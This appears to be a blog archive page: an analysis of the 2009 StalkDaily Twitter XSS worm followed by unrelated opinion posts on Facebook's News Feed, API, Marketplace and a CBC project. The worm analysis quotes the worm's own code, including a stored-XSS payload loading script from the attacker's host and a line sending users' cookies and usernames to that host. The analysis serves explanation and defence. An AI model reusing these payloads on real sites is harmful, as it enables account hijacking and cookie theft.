If you use Twitter a lot (unlike me) you’ll likely have been alerted and worried about the presence of a worm that’s been making the rounds at the popular micro-blogging website. The so-called “StalkDaily” worm was first noticed on Saturday, and it appeared to be able to “infect” a user’s Twitter profile, causing random tweets about the StalkDaily website (don’t go there) to show up on their profile. Furthermore, other user’s Twitter profiles could also become infected, seemingly by only viewing the profile of another infected user.

Eventually the source code of the worm was uncovered, (safe to view) and a quick analysis of the worm shows why it was able to quickly spread through Twitter so fast. Here’s an overview of how the worm worked.

Overview

The StalkDaily worm was apparently written by a person named “Mikeyy Mooney”, who is evidently a 17-year old from Brooklyn, New York. He created the original worm, plus other derivatives that spread using the same mechanism but displayed different messages on the infected user’s profile. The attack was not able to steal user’s passwords, thanks to Twitter’s security configuration, but it nonetheless caused over 10,000 unauthorized tweets to show up on users’ profiles.

Drilling down

An analysis of the source code of the worm yields some insight into how this malicious code was able to spread so effectively. Specifically, the attack used Type 2 or persistent XSS vulnerability, the most serious type, in order to achieve DOM/JavaScript injection into the Twitter site.

In this sort of attack, the attacker was able to arbitrary JavaScript into a page that was publicly viewable by any other user; in this case the page was a user’s profile. This injected JavaScript was then used to “infect” the profile of the user who viewed the already-infected profile, causing the cycle to repeat.

Specifically, the “URL” field of the user’s profile is targeted. This contents of this field were apparently not sanitized from user input, or the contents were not properly converted to HTML entities when setting the contents to the value of the href attribute when displaying the user’s URL or homepage/website. This is seen in lines 104 and 109 of the source code, shown below:

var xss = urlencode('http://www.stalkdaily.com"><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
...
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

The last line is where the user’s profile is updated to show the offending JavaScript; this essentially make the user’s profile execute the worm’s source code, causing anyone who views the profile to become “infected” themselves.

Thus the attacker was able to exploit this to arbitrarily inject a SCRIPT tag into the DOM linking to a JavaScript file (x.js) on his site. By doing this, he was able to get code he owned (the JavaScript file on his own website) to run at the privilege level of scripts on the Twitter.com domain. This “privilege escalation” of sorts is what allowed the script to perform actions on behalf of the user, including infecting their profile to spread to others, and causing the user to tweet phrases of the attacker’s choice.

Spreading

Once infected, a user’s profile would contain a link to the malicious JavaScript as described above. This is because the user’s profile shows a link to their website URL, which had been altered to inject the malicious JavaScript residing the attacker’s server. Because of this, anyone who was logged into Twitter and viewed an infected user’s profile would themselves be infected, and their profile would then become a vector for transmission of the worm, completing the cycle.

The source code also shows that each time you viewed an infected profile, the script would cause you to randomly tweet one of six different phrases, all of which linked to the StalkDaily website. It appears the attacker was trying to promote his website this way, but it’s also possible that going to this website could also cause you to become infected. While viewing a resource directly on the StalkDaily website could not cause you to become infected, due to the same-origin policy, it’s possible that a hidden iframe could be included on the site, pointing towards the profile of an infected user. This would case you to become infected.

Why XSS is so important to prevent against

Cross-site scripting attacks, or XSS for short, essentially occur because user-input data is not properly sanitized prior to being committed to persistent storage, or is not properly escaped into HTML entities before being output to a webpage or displayed. This can allow a malicious user to inject or alter the structure of the DOM, inserting script tags to inject their own arbitrary JavaScript into your website.

This attack demonstrates the need to effectively guard against these vulnerabilities, because such flaws can undermine other security precautions you have taken. For example, the source code of the worm shows that Twitter was using an “authentication token” for all form submissions in order to prevent Cross-site Request Forgery (CSRF) attacks. This is essentially using a temporary, random value to ensure that a form was submitted from the Twitter website itself, so that not any website can submit a form request to Twitter on behalf of a user.

This can normally prevent malicious websites from performing actions on your behalf without your knowledge; however because the XSS vulnerability allowed for DOM/script injection, the attacker’s script (on a separate domain) was able to run with the same privilege of a script on Twitter’s own site. Thus, it was able to read in the “authentication token” value from the HTML of the Twitter webpage, and use it to properly craft form submission data to alter the user’s profile and tweet on their behalf. This is seen on lines 85-90:

var content = document.documentElement.innerHTML;

authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
var authtoken = authreg.exec(content);
authtoken = authtoken[1];
//alert(authtoken);

Note that using a cookie to store the authentication token would not have prevented this. Because the script was running within the scope of the Tiwtter.com domain, it would be able to access the user’s cookies! In fact it does exactly this, and furthermore it sends your cookies to the attacker’s server so they can keep a log of them! Lines 78-81 show this: (The username is obtained from the DOM, much like the authentication token)

var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");

Other notes

Obviously central to this problem is the ability of scripts on other domains to run within the scope of another domain simply by being linked to on the page via a script element. This allows scripts not under the control of the originating domain to be able to access cookies and other information that would not be normally accessible.

However, this ability also allows useful services such as Google Analytics and other third-party services/APIs such as Google Maps, to work easily across different websites, allowing services to expose their features through a JavaScript API. Thus, making browsers reject third-party SCRIPT tags would cause serious usability problems; a better idea is to use a Firefox plugin like NoScript so that the user can have fine-grained control over issues like this.

Other points of interest when looking at the source code is that the bulk of the code are utility functions. The actual malicious code only takes up the last third of the file or so. For example, the function XHConn() is simply a standard cross-browser compatible implementation of XMLHttpRequest, the API used for the Ajax requests necessary to alter the user’s profile. Additionally, the urlencode() function is another utility function that allows values like the user’s cookies and the actual malicious script tag to be properly submitted in the Ajax request.

Lastly, the malicious code is set to be executed 3250 ms after the script is fully-loaded. (line 111) This is likely to ensure that the DOM is fully loaded and ready to be traversed to find things like the username and authentication token, instead of hooking into an event like window.onload.

Concluding remarks

This analysis identifies the following points:

1. The worm spreads by updating your profile URL to include the malicious script.
2. Simply viewing the profile of an infected user is suffice to cause your profile to become infected.
3. Every time you view the profile of an infected user, including your own, the worm will cause you to automatically tweet one of the random messages.
4. The random tweets from an infected user do not appear to contain the malicious code, probably because output here has been protected against that.
5. The worm steals the cookies you have set for the Twitter.com domain, along with your username, but thankfully no password information is stolen since Twitter does not store that sort of information in cookies. It also appears to log each visit to an infected user’s profile.
6. Visiting a third-party site (such as the StalkDaily website) may infect your Twitter profile if a hidden iframe has been included, pointing towards the profile of an infected user. This can be hard to detect, so using something the NoScript Firefox extension is recommended.

Note that this is not a criticism of Twitter itself, as designing any web application is difficult from a security perspective; it’s also worthwhile to note that Twitter responded fast to this issue, within hours on a Saturday. They appeared to have the situation under control as of yesterday and had patched the hole as well as being on their way to cleaning up infected users’ profiles. Understandably they are very upset and I hope they are able to sort the whole issue out.

It’s been a while since Facebook introduced the concept of “applications” to their API, providing developers a very flexible set of tools to create and add features to Facebook itself. Applications on Facebook are best described as “widgets”, since they offer functionality that’s often provided by widgets on other sites, so why Facebook chose a different name is somewhat peculiar.

I’m not going to debate the merits of these applications, or whether they’re leading Facebook down the road to a MySpace-hell dominated by personalized profiles that are an eyesore (there’s already enough discourse on that subject, both on Facebook and outside of it), but rather I’ll take a look at this from a developer’s point of view. What is the potential for developing an application for Facebook, and at the same time, what are the pitfalls?

Pro: Relatively easy to develop

Facebook’s API is easy to work with, especially if you have experience with PHP. One of the official client libraries is written in PHP, and since it’s intended to be used for web applications, this makes perfect sense. Using it to develop an application should therefore be a relatively pain-free process.

While the documentation isn’t always complete, there’s a nice Wiki that covers additional details, and together, these two should allow you to overcome most problems you may run into during development.

Overall, the abilities offered by the API coupled with its ease of use make development relatively straightforward.

Pro: Access to a large user base

Facebook’s current user base of 30 million is rapidly growing. It’s already doubled since the start of this year, and continues to grow at close to 3% per week. If that rate continues, they’ll double again by the end of this year. But perhaps the most amazing fact here is the dedication of Facebook’s user base. It’s one thing to have millions and millions of users, with only a small percentage that are actually active. This isn’t the case with Facebook, which sees over half of its users log in daily. That’s an astonishing statistic by any measure, and even more so when you consider Facebook large and fast-growing user base.

Thus, developing an application for Facebook gives it access to a large, and more importantly, active user base. This gives it a huge potential to grow virally, that is, from person-to-person. When someone adds your application to their profile or account, it will show up as a News Feed item. This means that anyone who has this user as a friend will see a message in their News Feed about this user adding your application. The idea is that they might get interested, click on your application, and then add it to their profile as well, continuing the viral spread cycle.

They can, of course, also find your application by doing a search – if you’re lucky enough to get your application listed in Facebook’s official application directory – more on that later.

Con: Cost and scalability

I think Marc Andreessen (of Netscape fame) put it best when referring to the popularity of an application on Facebook, namely that success kills. (The rest of his article, while lengthy, is an excellent read and I suggest you take the time to read it) Marc gives the example of the iLike application, one of the first, which experienced an insane growth in the early stages. During that time, they grew by 300,000 per day, eating up all of their capacity to the point where they had to buy new servers on a daily basis.

While a company such as iLike, with sources of revenue, may be able to shoulder this kind of burden, it’s quite unlikely that a lone developer would. This creates a sort of Catch-22 – you want your application to become popular, so that you could hopefully monetize it. However, in order for that to happen, you need plenty of resources – which require money.

If all you’re looking to create is a neat little application for you and your friends, or if your application doesn’t really create a huge load on your end, you’ll probably be alright. But be aware that the same dedication and large user base of Facebook that can be so excellent for spreading an application, can be the same environment that quickly overruns your capacity to support your creation.

Con: Monetization

While we’re talking about monetization, it’s worthwhile to point out that if this is your main concern, it’s probably best not to pursue Facebook application development. Since support costs can be high for Facebook applications, attempting to derive a successful business model on this will most likely be met with limited success, if any. Some have called for Facebook to start a revenue sharing program, but this is unlikely, considering Facebook’s uncertain financial future – even if the IPO rumours turn out to be true. (Which they likely will be)

A revenue sharing program, however, would be fair, since by creating a successful application you are adding value to Facebook’s site, and directly increasing their revenues by nature of increasing the time a user spends on the site. I would not, however, hold out on this to develop.

This doesn’t mean that application development is limited to those who just want to create something “for fun” or to add something to their portfolio. On the contrary, I believe the best opportunities the Facebook platform affords is to other businesses based on web services. By utilizing Facebook, they can create applications that promote their site, or tie into their own API, thus using Facebook’s large user base as a source for new customers, users, and thus revenue. Indeed, the first applications developed were made by companies with this very intent. Other sites could follow this model.

Other Cons

Some believe that the viral nature of Facebook apps has been overstated, and that they now don’t spread as easily.

Another, more serious aspect, relates to something I alluded to when I commented on Facebook’s introduction of their Marketplace, a classified-listing type service. It seems that in the TOS of the Facebook Platform, they reserve the right to make a similar application to yours, without obligation to you. I don’t know if this is standard legalese in a TOS for API usage, but certainly it can be construed to be something more sinister, and would deny you any right you had to something you’d created. Of course, if Facebook did do something like this, I’m sure there would be an uproar from the community, with Digg fanning the flames, of course.

Privacy, as always

Privacy is also a concern, as it now not only falls on the user to determine what settings to implement, but also whether developers will respect the TOS of the Facebook Platform. The documentation clearly outlines what user (and user’s friend) info can be stored, but there is nothing to stop a developer from storing more of that information, either for the purposes of adding another feature to their application, or for malicious intent. There have already been concerns about this with popular applications.

The issue of privacy here is that when you sign into a Facebook application, it basically has access to all of the friend info that you would – after all, it probably needs this to perform whatever function it does. Though you may have consented to allow this information to be used, your friends may not have explicitly done this, and may not want their information to be used by 3rd party developers.

Though users can opt-out of participation in the Facebook Platform altogether (and thus prevent 3rd party developers having access), I’m guessing that not everyone or even a majority know about this feature. The privacy settings of Facebook have grown almost as much as the site itself, with settings divided amongst sections and sub-sections, creating somewhat of a convoluted mess. The best precaution to all of this, of course, is not posting anything on the Internet that you wouldn’t want to be known in public. This applies not only to Facebook but other sites as well; I only emphasize this for Facebook because of the notoriety its obtained from such incidents.

Just over a month ago, the CBC launched their Great Canadian Wish List project on Facebook. Reaching out to the young people of Canada (who use Facebook), the project aims to gauge “grassroots” support among them by allowing users to create a “wish” or cause that others can then support. The most popular “wishes” will then be made part of the CBC’s Canada Day coverage special. With so many issues facing our modern Western society, the project had lofty goals in attempting to stoke the interests of youth. However, as expected, the “wish list” has mostly descended into another yet another debate on abortion, and gay marriage.

Burn baby, burn

Despite this being the CBC, I don’t believe they could’ve been this clueless. While the Wish List had noble aims – that is, seeing what was really on the minds of young Canadians – it’s all too easy for such a venue to become overrun by polarizing issues, especially in North America. Any sort of “debate” on the Internet almost invariably devolves into a flame war – it is rare to see a well-rounded debate here, since there are no real moderators, and all it takes is one bad apple to ignite the volatile mixture.

Thus, you can see how it didn’t take long for “Abolish Abortion in Canada” and “I wish that Canada would remain pro-choice” to become the two top wishes on the list. Gay marriage, the Paris Hilton of debate issues (in terms of relevance) isn’t far behind in the polls. The numbers change constantly, and so does the leading wish, as people from both camps attempt to rally “grassroots” support amongst the users of Facebook. Of course, the accuracy of these numbers at determining “true” national opinion on these issues is suspect. First of all, it’s a voluntary Internet poll, so by definition it is limited to only those who care for using the Internet to express their views. Secondly, it’s limited to Facebook users. Thirdly, and perhaps most importantly, the polls aren’t limited to Canadians, so obviously issues that are popular in America are going to rise to the top here.

Godwin’s Law invoked

One of my biggest peeves with online debate is the ease with which preposterous comparisons and straw-man attacks reign supreme. Evidently, most people who’ve never even heard of logical fallacies think it’s a brilliant idea to compare an argument to something horrible, in an attempt to draw the negative emotional response associated with it. For example, take a look at this comments page in response to an anti-abortion/pro-life article that was part of the Great Canadian Wish List project. As expected, there are a plethora of responses, and I count no fewer than four references to “Hitler” – supporting both sides of the debate! This was actually a relatively good “Internet debate”, as far as my experience goes, and yet we still could not avoid the “Reductio ad Hitlerum” fallacy.

I still don’t know why this persists, especially in online debate. Perhaps it’s the knowledge that you can espouse a ridiculous argument over the Internet, and not look like a fool behind its protective wall. Godwin’s Law has been around since 1990 – that’s right, 1990, before there was even a real Web, and dial-up was a luxury only real geeks could afford. (Or sacrifice to obtain) Godwin’s Law is perhaps one of the things about the Internet that will never change – remarkable for something that often changes so fast.

Fanning the flames of discontent

However large my distaste for logically misconstrued arguments is, my real problem is not with the participants of this project, but rather with the CBC itself. They must have known that this “Great Canadian Wish List”, with its prospects of getting prime time news coverage to any topic that had great “grassroots” support, would have been divisive and bitter. And yet, they chose to go ahead with it anyway, using one of the largest and most active social networks, Facebook, as their launching platform. The issues brought forth may not even be of true major concern to most Canadians (since apparently anyone can vote), and furthermore the numbers may not be truly representative. However, the appearance is impressive, thanks to outspoken groups on both sides.

It’s hard to say whether the numbers of supports are really indicative of grassroots support, or rather due to an organized few. For example, it was recently revealed that 99% FCC complaints about aired TV content are due to a single activist group – the Parents Television Council. With their efforts, complaints skyrocketed from a mere 350 complaints in 2000 to a whopping 240,000 in 2003. (Reminds me of that time Stephen Colbert tried to get that bridge named after him.) Without this knowledge, one would think that the massive increase in complaints filed to the FCC was due to some sort of revival of “morals” or a huge increase in objectionable content on TV, or both. Clearly, this is not the case.

The chances of this occurring with something like CBC’s Great Canada Wish List are all too high. Not only do the loudest groups get their views promoted to the top on Facebook, but they also get the resultant mess aired on CBC, and their issues brought to the forefront, no matter how divisive or irrelevant. Never mind that the results may not be accurate, even in the context of Internet polls, and never mind that Canadians aren’t the only ones participating in the polls – this was all done to provide a nice ratings boost and a little something different than traditional Canada day coverage.

Shame on you CBC, shame on you.

Facebook recently launched the latest version of their Platform, which combines their API with FQL and the new FBML. Facebook launched the next version of their platform at their developer’s conference, and accompanied the launch with many partner companies that rolled out applications designed with the platform simultaneously. This was also a huge event for independent developers, many of which got to work immediately on their own Facebook apps. (Thousands are now available) This is a huge event in the history of Facebook, and perhaps the next step in where the hugely-popular social networking site will go. As with any change in a social networking site, this one was met with some resistance and concern, but is it warranted?

The basics

The Facebook API has been around since last year, but has since added many more features. In its first version, there were only a limited number of methods one could call to request data. Early this year, they added FQL, their own SQL-like query language to allow for more flexibility in accessing that data. (In fact, now most of the API calls merely map to FQL queries as well) This newest version has added FBML, Facebook’s own markup language. Just like FQL is related somewhat to SQL, so is FBML to XHTML. Thus, web developers will have no problem adjusting to these Facebook-specific languages. From Facebook’s point of view, this makes them way more popular with developers.

FBML is big because it allows integration of Facebook apps with the main site. Before, Facebook applications were run on the developers’ own sites, and didn’t really hook into the main site. While the backend of the application will still have to be run off another site, data from the app can be neatly hooked into the main site in a variety of places, providing slick integration with Facebook itself. To quote Facebook:

You can hook into several Facebook integration points, including the Profile, Profile Actions, Canvas, News Feed and Mini-Feed.

This effectively turns Facebook apps into “widgets” that add features and functionality to the main site. In this way, users can pick and choose what neat apps they want to use on Facebook. At the same time, Facebook can keep the site neat and clean, because the integration makes it easy to adopt the Facebook “look & feel” for these widgets, preventing Facebook from turning into the graffiti-invested section of the web that MySpace is.

It’s about developers

Besides the ease with with most web developers will be able to learn the use of FQL and FBML, Facebook has also redone their Developer’s Site, making it look more different and separate from the main Facebook site. Most of the information remains the same, but it has been organized and streamlined more, and there are plenty of examples. Facebook also took the time to sign up many launch partners. For example, Last.fm quickly launched their Facebook application, and it’s quite popular.

Even more interesting is that Facebook is letting application developers keep the revenue made from ads served through their application. I guess this is a win-win situation, since by using the app, people stay on Facebook even more, so in the end, they make more money as well through their own ad system. This allays some of my fear outlined in my previous article about Facebook competing with services created through their API.

The OS of the web?

If this really is the case, then it signals a new direction for Facebook. No longer content to be just a popular social networking site, they now want to be a platform for all sorts of applications that will automatically have a wide audience. In this way, you can view Facebook as the “OS” and all of these widgets as the applications created for the users, in this case, the membership of Facebook. Users can easily pick and choose which apps they want to use, so nothing is forced upon users. Even “core” Facebook features such as “Notes” are placed under the same heading of “Applications” alongside user-created ones, so you can even opt-out of these.

This will have the overall effect of making Facebook the central place for social-networking. No more will users have to wait for Facebook itself to add features to the site, as if there’s enough need, some enterprising web developer will add the functionality. Want a calendar? 30boxes has one. (I’m waiting for a Google Calendar widget) Overall, I’m really impressed by the technical ideas behind all of this.

MySpace syndrome

One huge concern is whether or not allowing users to add any widgets they want to their profile will result in Facebook’s quality deteriorating to MySpace-like levels. No doubt that was a huge concern of the Facebook team, as they have built a successful social network that many users see as being more mature than MySpace. For the most part, they’ve accomplished this – integration with the main site has been done in a controlled way to ensure that widgets keep with the look & feel of the site, and don’t allow someone to turn their profile into an ugly affront to the visual sensory system.

However, users can still tend to overpopulate their profile with too many widgets, making things look cluttered. And, there’s nothing stopping anyone from making drawing widget. But perhaps the most unwanted feature was the addition of “trackers”. Many MySpace profiles now feature these – basically a link or an image to a third-party server that once loaded, can tell the profile owner who has visited their profile and how many times – a sort of form of reverse-stalking. Facebook took steps to ensure that this was not possible with their widgets.

This hasn’t stopped anyone from making such a widget for this purpose. However, this widget requires a user to click a link on the profile page in order to be tracked. In order to do this, they try to attract you to click this link because it sends you to a page that also shows who else has viewed the profile. It would seem that people’s capacity for voyeurism is boundless. However, as with all apps, you don’t have to add it, and you can even block or restrict it if you want.

In the end

All things considered, this will be beneficial for Facebook’s bottom line. I seriously doubt they’ll lose any significant number of users from this, and will certainly gain more and keep the existing user base happy and interested in what they’re doing. I think they learned from last year’s uproar over the introduction of News Feed that the loudest dissent starts right after the addition, and dies down soon after. News Feed is now an accepted part of Facebook, and I don’t think anyone would want to go without it.

It seems that before the launch of this service, Facebook decided to solicit some feedback from its users about its usefulness to them. After the “debacle” that surrounded last year’s introduction of the “News Feed”, perhaps they were a bit edgy about introducing new features without getting their users’ opinions. However, I believe this new service will be a big success, and should have come earlier. It also perhaps signals that there are more services to come.

If you build it, they will come

Yes, this is true, but with a slight modifier: If you build it, they will come, and possibly complain – but they’ll still come. Look at the news feed – when it debuted, users were up in arms about the “privacy violations” that it would bring. Now, it’s just as much a part of Facebook as anything else. At the core, it’s a good feature, but people just hate change. After they adjust to it, as long as it’s a good change, they’ll like it. And, considering that most of Facebook is the under-30 crowd, who easily adjust to new changes due growing up with computers, the adjustment won’t take long.

Which is why it’s perhaps a surprise that Facebook didn’t introduce this feature earlier. It fits right in with the concept of Facebook, that is, a localized social network of people you actually know. Research shows that people use Facebook like it’s a drug, and now that this new Marketplace is up front and center, it’ll be sure to attract lots of usage, perhaps even providing real competition to services like craigslist. Perhaps that’s the real power of Facebook – it has the ability to provide a huge audience to new services, provided they’re good.

In fact, many developers have rolled out similar services before Facebook’s, some of which even use Facebook’s own API to tie-in the service with Facebook. Also, Oodle recently sponsored a group on Facebook to attract users to its own classified service, though how effective this will be in light of Facebook’s new Marketplace, remains to be seen.

Part of the plan?

Facebook’s hesitation may have been part of their overall plan, though. No doubt they have smart people working for them, monitoring various online services that they’d like to compete against. They may have seen the popularity of classified ad sites, or more importantly, those that were using the Facebook API to implement their services. By allowing these sites to “take the plunge”, they could gauge the viability of such a service to the Facebook crowd – that is, whether it was worthwhile or not. Then, once they were convinced, they could begin working on an in-house version, that once ready, could be dumped onto “the masses” for an almost-certain success. Perhaps this was at least a part of the reason for the development of Facebook’s API last year.

Feature creep

Though I believe that this should have come earlier, I respect Facebook’s hesitation at introducing new features. Facebook, at it’s core, hasn’t changed much. They’ve only added new features slowly, and by doing this they avoid feature creep – the stage when an application has so many features that most users don’t know what they all do, and as a result, it ends up feeling bloated. Remember, when it comes to widely-used applications, simple is beautiful. By introducing new features only once in a while, Facebook gives its users time to adjust, so that they don’t feel like the site is changing into something very different than the one they joined.

However, I believe this may signal the end of Facebook’s Flyers, a paid ad feature. These were little user-generated ads that could be purchased for a fixed rate – you could, for example, buy an ad that would be displayed for 10,000 page views. Most of the ads that I saw were classifieds and would fit right in the new Marketplace section of Facebook. Now that you can place such an ad for free that people can search for, I see little use for “Flyers”. Facebook will likely quietly retire this feature, or it’ll only be used by companies wanting to advertise products and promotions.

Now, if you’ll excuse me, I have go list my textbooks on the Marketplace.

Since the changes were put into effect, scarcely a day ago, a bevy of groups voicing their opposition to the new features have sprung up on Facebook. Many of them are united by the fact that the news feeds crowd their starting page now, and cause information overload – something I criticized as well. However, most of them decry these new features as being huge breaches of privacy and point to how they make stalking much easier.

Outrage and calls for a boycott

Many anti-changes-to-Facebook groups have been formed, but the largest one (with an online petition), has almost 500,000 users and is still growing at a fast pace. Many of the comments talk about how this is turning Facebook into a ripe target for stalkers, and of the potential for privacy violation. Certainly such a large group of people can’t be wrong?

The Internet is not private

While I admit these changes do help to advertise events in such a way that more people find out about them then some would like to, I don’t believe it fundamentally affects the privacy of Facebook. As I mentioned in my original post, this will hopefully serve as a reminder that privacy on the Internet, even it is in a seemingly locked-away area such as Facebook, is something that one cannot expect. If you post information in a publically-accessible area on the Internet, someone will eventually find out about it, either by mistake or through the Googlebot.

However, much of these concerns are ill-placed. As mentioned on the Facebook blog, no extra information that wasn’t publically available before, has been made available by this update. All it does is aggregate all of that information about your friends in a way that’s supposed to make it easier for you to read. I agree that some options should be provided – such as what information you want to see about your friends (eg. I don’t care that someone wrote on someone else’s wall), but if you don’t want your information showing up on other people’s feed, simple disable those options in your privacy setting in Facebook.

Of more concern

What’s more important to know is that Facebook is not a secretive place and has never been. It’s already been used to identify and charge people for offences because of photos someone posted of them committing incriminating acts. It’s also reportedly used by employers concerning potential employees. Don’t think that someone can access your profile if they’re not in your network? Patriot Act – Read it. (Shameless Arrested Development quotation) Are your privacy rights being violated by all this information-gathering online? I don’t know, maybe; but the lesson here is clear. If you don’t want to take the chance having something private revealed about yourself, don’t post it online.

A rude wakeup

Any big change to a user interface is bound to cause some uproar, but this has provoked extra outcry because it has outlined the true nature of “privacy” on Facebook. The default privacy options are apparently too loose for most people, but most people haven’t bothered to change them – until now. Additionally, many people simply add whomever requests it to their friends list, without thinking about whether they would want that person to be privy to certain bits of information they post on Facebook. While I do think that some changes need to be made now with the new features, I don’t think that these new features intentionally infringe on privacy. The features were meant to allow one to quickly share updates with friends – not with random people you just add as friends. Perhaps people will exercise more discretion in the future, returning Facebook into a real “social” network.

Update (2006-09-08)

Facebook has responded by making changes to allow users to choose what updates and information they want to be displayed in the News Feed and their Mini-Feed. Sounds like a good way to ease in the changes, as people can now decide what they want advertised – they should have done this from the beginning, but it’s nonetheless good to see them listening to their users.

Things like friends’ status updates, new friends of your friends, new photos of your friends, and groups that you friends have joined/left are listed, along with when these actions occurred. Basically, most of things that people would browse around for about their friends have been nicely aggregated into one page for easier viewing, making the service easier to use and more relevant. However, it’s almost information overload – I don’t really need to see every status update on what groups my friends have joined or left, do I?

Additionally, it makes it easier to snoop in on what your friends are doing on Facebook and when they’re online – though it should be noted that all the information posted in the News Feed was always publically available; this just makes it dead simple to find all of it.

The second feature that was added was what they called a “Mini News Feed”, which is displayed on every personal user’s profile. It’s basically the same as your News Feed, except it displays only the updates for that user/friend – again making it easier to keep track of your friends and what they’ve been doing, which only serves to further improve Facebook’s social networking ability.

I agree with TechCrunch’s assessment that Facebook “gets it right” when it comes to social networking – it’s more about making the end user experience better than just about increasing pageviews, and often the two are conflict. Other sites just can’t compare, in my opinion. My only suggestion for improvement would be to have some sort of settings page for the News Feed so what’s displayed can be customized.

Nothing’s changed with privacy?

However, I disagree with Facebook’s assertion that these changes “do not give out any information that wasn’t already visible“, at least in principle. While it’s true that before you could have constantly scanned each and every one of your friend’s profiles in order to figure out when they had joined certain groups, posted wall messages or otherwise updated their profile, this would have been very tedious and time-consuming, and only the most dedicated stalkers would be able to keep up. The new features make this pseudo-voyeurism all too easy. (You could have also written a scraper before, but this would probably have been against the TOS)

If there’s anything good about these changes, it’s that it’ll make people think twice about posting incriminating or otherwise personal information that they would normally want to remain private. It may also force users to reconsider who they really want to add as a “friend”, and how they want their privacy to be set.

I’ll still be using it

Of course, I’m not going to stop using Facebook. But, maybe the way I use it will change – and most likely this will be true with many other users, if the newest Facebook group, entitled “The New Facebook is Freaky as Sh*t“, is in any indication of this. How did I learn of this group? By noting that a friend of mine had just joined it, as of 11:17 PM EST tonight.

There are already many blogging services out there, with most of them more fully-featured than Facebook’s Notes service, so what makes this significant? Well, first of all, Facebook basically has a monopoly on the university and college social networking scene, so the addition of any service carries some relevance right away. Furthermore, they’ve added an RSS import feature, allowing users with existing blogs to syndicate/re-display their blog entries in Facebook Notes with ease. Most online blogging services already include feeds, so this step should be compatible with most services existing user are already on, and it provides a nice transition path. Furthermore, imported feeds include a link back to the original site, providing an incentive for users wanting to increase traffic back to their site.

What’s even better is that you can easily add tags to an entry, describing who the entry relates to. The field for this has been nicely enhanced with Ajax, so as you type a list of matching friends pops up, to facilitate autocomplete. You can also see a list of Note entries that were tagged with your name. One of the things Facebooks is really good at, is helping people find other people with similar interests, and this is possible because of the great use of metadata they’ve undertaken. Tagging entries is just another way they’re improving this.

One thing some people are worrying about is that this might be seen as a signal that Facebook is moving towards MySpace in terms of how they want people to use the site, with more and more customized user content. One thing that has thankfully separated Facebook from MySpace is the lack of user-customizable layouts and colours on profiles. MySpace’s liberal allowances for user-customized profiles has resulted in blatantly awful sites that combine the worst colour combinations with site-stretching pictures and horrible embedded sounds and music, making it look worse than the Geocities of the late 90′s. Let’s hope Facebook keeps the layout rigid and clean, so that it’s possible to browse the site without losing your eyes.

If you open it, they will come

Opening an API up to developers is a great move, for several reasons. Firstly, it signifies that your organization is open to feedback and ideas from the community, and gives them the green light to develop new uses for your service. Developers will surely create new applications and plugins that allow your service to be used in many different contexts, thus increasing both the popularity and scope of your website or service. But, perhaps the best part is that these developers willingly create these extensions, offering improved functionality, for free. As much as I hate MySpace, they could learn a thing or two from Facebook’s API move, considering they’ve made moves in the exact opposite direction. The release of this API, for Facebook, is further insurance that their service will have staying power with its users; it’s already been reported that 85% of college students are using it, with the majority logging in at least once a week.

In many ways this is like a game developer releasing a SDK to allow other developers to create mods for it. No matter which way you look at it, the end result is beneficial to all. The original game developer gets more exposure, end users get more substance, and mod developers get a chance to show off their skills.

Facebook is also popular with the geeks

As mentioned before, developers are already at work making new services for Facebook; it’s almost as if they were waiting to pull the trigger on this one – and this is only on the first day! Though the beta API is somewhat limited, some ideas that could be done include: working with a user’s events to transform them into a syndicated format (such as RSS or Atom), or even to move them over to a different format (like iCal) or service like Google Calendar using their API.

Another use that’s been talked about is somehow integrated Facebook functionality with Google Maps, using the respective APIs – that would totally rock. However, at present time I don’t think it’s possible – I don’t see any methods available for getting location information, but in the future, I see this becoming a reality. Edit: I stand corrected. Check out Facebook Friend Mapper. (There is a users.getInfo() method that I apparently completely missed.)

At present time…

As mentioned, the API is currently in beta, so expect more methods to be added beyond the original 14 that are currently described in the documentation. Some other facts from the terms-of-service are:

API use is currently free, but this may change

This is pretty standard legalese. You’re currently limited to 100,000 requests per day.

You are not allowed to store Facebook data on your site

Makes sense as well; it’s Facebook’s data, they don’t want you just copying it and hosting it off-site.

Intellectual Property – you own all the code you create

This is a pretty important one. Facebook won’t “appropriate” what you’ve created, but at the same time, you’re responsible for what you create, not Facebook. If you develop an application that makes the user’s computer catch fire, burn down their house, and kill their kitten, obviously Facebook is not going to foot the legal bill.

Facebook can expect good returns on this move; many users have wanted a calendary to display their events, and now that functionality can easily be added by a developer, without Facebook even having to commit time or money to it. Other features could be added in a similar manner, if Facebook continues to add to their new API.

Facebook is pretty much the only large, well-designed social networking site, and the release of their API only furthers this positive perception. MySpace is pretty much the exact opposite, and I don’t think they could care – they have plenty of users, are making a lot of money, and just signed a huge deal with Google. For them, it’s a classic case of “if it ain’t broke, don’t fix it”. Too bad that basically keeps them where Geocities was during the late 1990′s. Kudos to Facebook for being progressive.

It’s all about the advertising

The advent of Internet advertising as a viable income source has been the fuel for this tranformation. Ever since the major players launched huge ad networks (Google’s AdSense and Yahoo’s Publisher Network), it’s becoming easier for sites to “make a quick” buck without apparently selling any service or product. This ad model is what allows you to sign up for a bevy of free services, from webmail to social news sites, and has been the basis for large social networking sites like Facebook. It’s also been a focal point for traditional news services, who not only have been making money off ads on their own sites, but have also bought out sites like MySpace in the further hopes of money from online advertising.

However, it’s also had the effect of making it much easier for “the little guy” to get into the business, sometimes wreaking havoc on established businesses. A great example is Markus Frind, who single-handedly started up a dating site that shook up the entire online dating industry, as he began offering a something for free that typically was a paid service. He made quite a lot of money off of his site, but overall, things were much cheaper for the “customer”. (No fees as opposed to fees)

The long tail

This sort of action by smaller companies is going to change the industry, and Markus himself best sums it up. The basic idea is that smaller startups, entirely self-funded (or at least not venture-capitalized), are taking over sectors, offering services and will be entirely happy making overall, less money than their predecessors. One need only look at TechCrunch on a regular day to see many of these startups being featured.

On the web, things move about ten times as fast, and that includes the launch of new companies and how their services will change and be updated. Where else can a business or service launch, and then suddenly be bought for $2 billion only a scant few years later? The pace at which ideas spread on the web is frightening.

Wag the tail

